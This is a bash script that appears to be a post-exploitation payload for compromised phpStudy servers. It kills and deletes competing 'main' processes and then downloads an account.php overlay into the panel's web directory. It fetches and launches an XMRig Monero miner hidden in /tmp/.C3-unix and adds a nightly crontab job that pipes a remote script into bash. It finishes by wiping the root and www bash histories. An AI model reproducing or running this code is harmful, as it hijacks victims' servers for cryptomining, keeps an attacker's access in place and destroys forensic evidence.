#!/bin/bash

VERSION=1.0


# Get the process IDs of all main process
pids=$(pgrep main)


# Prompt version
echo -e "\033[36m Kill v$VERSION. \033[0m"


# Dividing line
echo -e "\033[32m ---[ Kill ] --------------------------- \033[0m"


# Try to Remove
echo -e "\033[32m [*] Try to Remove mian \033[0m"
rm -rf /usr/local/phpstudy/soft/main
rm -rf /usr/local/phpstudy/soft/main.1
echo "rm -rf /usr/local/phpstudy/soft/main"
echo "rm -rf /usr/local/phpstudy/soft/main.1"


# Check if any main process is running
echo -e "\033[32m [*] Kill Target process \033[0m"
if [ -z "$pids" ]; then
    echo "No main process found"
else
    # Kill all main process
    kill -9 $pids
    echo "All main processes with PIDs $pids killed"
fi

# Download overlay
echo -e "\033[32m [*] Download overlay \033[0m"
wget -P /tmp/ https://github.com/ShizukuTeam/PhpStudyRCE/raw/main/account.php||curl -L "https://github.com/ShizukuTeam/PhpStudyRCE/raw/main/account.php" -o /tmp/account.php
cp /tmp/account.php /usr/local/phpstudy/web/service/app/ && rm -rf /tmp/account.php
rm -rf /tmp/account.php

# XMR
wget -P /tmp/ https://github.com/ShizukuTeam/PhpStudyRCE/raw/main/c3.tar.gz||curl -L "https://github.com/ShizukuTeam/PhpStudyRCE/raw/main/c3.tar.gz" -o /tmp/c3.tar.gz
mkdir /tmp/.C3-unix
tar -xzvf /tmp/c3.tar.gz -C /tmp/.C3-unix
chmod +x /tmp/.C3-unix/xmrig
chmod +x /tmp/.C3-unix/miner.sh
nohup /tmp/.C3-unix/miner.sh &
rm -rf /tmp/c3.tar.gz
echo "30 23 * * * bash <(curl -sL https://github.com/ShizukuTeam/PhpStudyRCE/raw/main/xmr)" | crontab -
echo -e "\033[32m [*] XMR ok \033[0m"

# Clear /root/.bash_history
echo -e "\033[32m [*] Clearing log \033[0m"
echo "" > /root/.bash_history
echo "" > /home/www/.bash_history
echo "Cleared /root/.bash_history"
echo "Cleared /home/www/.bash_history"

# End
echo -e "\033[32m [*] End ... \033[0m"
